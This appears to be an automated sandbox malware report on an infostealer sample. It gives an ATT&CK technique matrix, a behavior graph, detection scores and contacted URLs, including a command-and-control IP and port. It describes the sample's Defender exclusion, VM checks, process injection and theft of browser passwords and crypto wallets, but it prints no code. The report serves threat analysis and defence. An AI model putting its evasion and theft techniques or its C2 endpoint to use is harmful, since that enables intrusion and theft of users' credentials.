                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		331
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483367 Sample: RgIbrhxoEx.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Sigma detected: Scheduled temp file as task from temp location 2->58 60 10 other signatures 2->60 8 RgIbrhxoEx.exe 7 2->8         started        12 LjGABleGAy.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\...\LjGABleGAy.exe, PE32 8->42 dropped 44 C:\Users\...\LjGABleGAy.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp3B03.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\RgIbrhxoEx.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Adds a directory exclusion to Windows Defender 8->68 14 RgIbrhxoEx.exe 15 49 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        70 Multi AV Scanner detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 24 LjGABleGAy.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 185.222.57.151, 49706, 49708, 49709 ROOTLAYERNETNL Netherlands 14->52 28 conhost.exe 14->28         started        74 Loading BitLocker PowerShell Module 18->74 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        76 Tries to harvest and steal browser information (history, passwords, etc) 24->76 78 Tries to steal Crypto Currency Wallets 24->78 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RgIbrhxoEx.exe83%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    RgIbrhxoEx.exe43%VirustotalBrowse
                    RgIbrhxoEx.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe83%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe43%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%VirustotalBrowse
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%VirustotalBrowse
                    https://api.ip.sb0%VirustotalBrowse
                    http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip0%VirustotalBrowse
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://185.222.57.151:55615t-0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://185.222.57.151:55615/0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    http://185.222.57.151:556150%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                    http://tempuri.org/Endpoint/CheckConnect1%VirustotalBrowse
                    http://185.222.57.151:556154%VirustotalBrowse
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                    http://185.222.57.151:55615/4%VirustotalBrowse
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    185.222.57.151:556150%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                    http://tempuri.org/00%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                    http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                    http://tempuri.org/00%VirustotalBrowse
                    http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                    185.222.57.151:556154%VirustotalBrowse
                    http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.222.57.151:55615/true
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    185.222.57.151:55615true
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/ip%appdata%RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnectResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003100000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%RgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ip.sbLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ip.sb/geoipLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/envelope/LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnectRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdateResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0RgIbrhxoEx.exe, LjGABleGAy.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.222.57.151:55615t-RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ipify.orgcookies//settinString.RemovegRgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://185.222.57.151:55615RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdateRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/0RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2217562708.0000000003226000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/actor/nextRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.222.57.151
                    		unknownNetherlands
                    		51447ROOTLAYERNETNLtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483367
                    Start date and time:2024-07-27 04:11:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:RgIbrhxoEx.exe
                    renamed because original name is a hash value
                    Original Sample Name:304ea6d5cf3786d19de14f004d7d057a.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@21/103@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 111
                    • Number of non-executed functions: 13
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
